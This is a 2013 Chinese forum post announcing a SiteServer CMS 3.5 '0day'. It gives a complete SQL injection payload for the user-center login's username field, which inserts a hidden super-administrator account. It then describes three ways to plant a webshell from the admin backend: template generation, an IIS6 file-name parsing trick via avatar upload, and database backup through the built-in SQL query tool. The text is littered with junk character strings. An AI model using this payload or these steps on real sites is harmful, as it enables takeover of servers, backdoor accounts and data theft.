找回密码
 立即注册
查看: 2664|回复: 0
打印 上一主题 下一主题

SiteServer CMS 0Day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:10:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
经测试秒杀最新的3.5版9 I6 |6 }% f7 v5 X/ O
3 i, g8 m' i+ T. g
stieserver官网:www.siteserver.cn
9 ]' `% n+ t5 P! P1 y+ H  v4 p! G

- [# n! O: w# L, W, r9 V0 f8 N8 o, C1 A" l! [" ?0 M0 \
EXP:
. L) m5 j* S3 l% h
. [$ y# q+ |6 l% O- e( ]直接访问UserCenter/login.aspx# h# }; V+ A2 c+ B+ X8 [' g! j- G
" A- [0 b' U% m$ O. \9 _

2 F9 v3 R% M) ?2 n
. }4 t% O. T  @! `- K用户名处输入:
( j* b  P" B) `# L/ `2 ]6 H  S0 f) H" ^2 {/ R: Y0 j3 X: U
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--# y  ~0 _8 J: P
' |7 m6 N0 D: C- Q; V6 h/ U' h
7 A7 h; A$ i7 h% ~8 x

2 H( Q& V. W; {: m+ i0 X2 w密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。7 @) j. r' ?. c" _
3 J' B& g* Z0 `0 y' w) N4 Q
" ?0 V" d, c8 ^- T7 d0 D* n: K
1 C1 Q: \: _4 T1 H7 `* D2 D
之后再访问后台SiteServer/login.aspx用插入的用户登陆
3 h) n- D4 M0 F+ t: B: Q9 v& P0 I) W& y% O4 B

$ U. N2 D3 ]! t9 Q1 Q) M6 J8 P" F/ b# b7 X  g& M
后台拿webshell的三种方法:
( g. \* g# P6 O9 }
$ O$ J  U/ k9 q一、4 J5 W1 W. T' r# n! ?2 ]: G
# ?* `# m- q0 B* h7 ^4 G
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx1 r/ y8 f9 z: v7 I
: f. q9 P9 o3 X3 B
二、
3 U$ Z9 B( K: ^- d* C
, i) J4 P2 }% M2 G+ P成员权限-》添加用户-》用户名为:1.asp- s6 T: a" Z) w5 h. K# ~

. l2 h8 J- J( X5 }6 ]; Hhttp://127.0.0.1/usercenter/
5 P9 N0 X* K! ]4 J2 c1 g
* s- b3 U- D, ?用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell, X# C7 R  I4 L5 E4 p- m

' o; ?1 x4 W, [, f(ps:后台添加用户时不会验证是否含有非法字符)4 U  `. W  M& g' _9 f# `) c

! A$ v/ J) m! I6 ?. i三、
6 `9 s2 B; v4 r  B- B' B: ~7 E& K7 I
系统工具-》实用工具-》机器参数查看2 K- r% i1 y- `7 r, T* k3 t( }! c
可以看到数据库类型、名称,WEB路径
, x  N- y0 s0 H) U1 |2 H' J& m
/ C+ u$ y% Y0 H- t系统工具-》数据库工具-》SQL语句查询0 \1 J4 G/ |- u' t/ h
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。3 S5 d6 u# }( c# I, l$ r
2 Z* G& J1 w# N0 v' k/ L
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表